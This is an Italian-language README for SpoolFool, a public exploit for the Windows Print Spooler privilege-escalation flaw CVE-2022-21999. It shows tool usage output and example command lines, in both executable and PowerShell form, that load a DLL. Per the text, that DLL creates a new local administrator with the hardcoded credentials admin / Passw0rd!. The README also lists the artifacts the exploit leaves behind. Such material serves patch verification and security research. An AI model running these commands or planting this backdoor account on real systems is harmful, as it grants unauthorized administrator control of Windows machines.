
Exploit per CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)
Exploit per CVE-2022-21999 - Vulnerabilità di elevazione dei privilegi dello Spooler di stampa di Windows (LPE)
L'exploit fornito dovrebbe funzionare per impostazione predefinita su tutte le versioni desktop di Windows.
Per i dettagli tecnici completi, consultare il post del blog qui.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
Di Oliver Lyak (@ly4k_)
Esempi:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
Di Oliver Lyak (@ly4k_)
Esempi:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
La seguente PoC utilizza una DLL che crea un nuovo amministratore locale admin / Passw0rd!. La DLL (AddUser.dll) e il codice sorgente sono disponibili in questo repository.

Seconda esecuzione
La seguente PoC mostra una seconda esecuzione dell'exploit fornito. Si noti che questa volta la vulnerabilità non viene sfruttata per caricare la DLL.

Dopo l'esecuzione dell'exploit, i seguenti manufatti rimarranno per una successiva pulizia:
SpoolDirectory della stampante target non viene ripristinato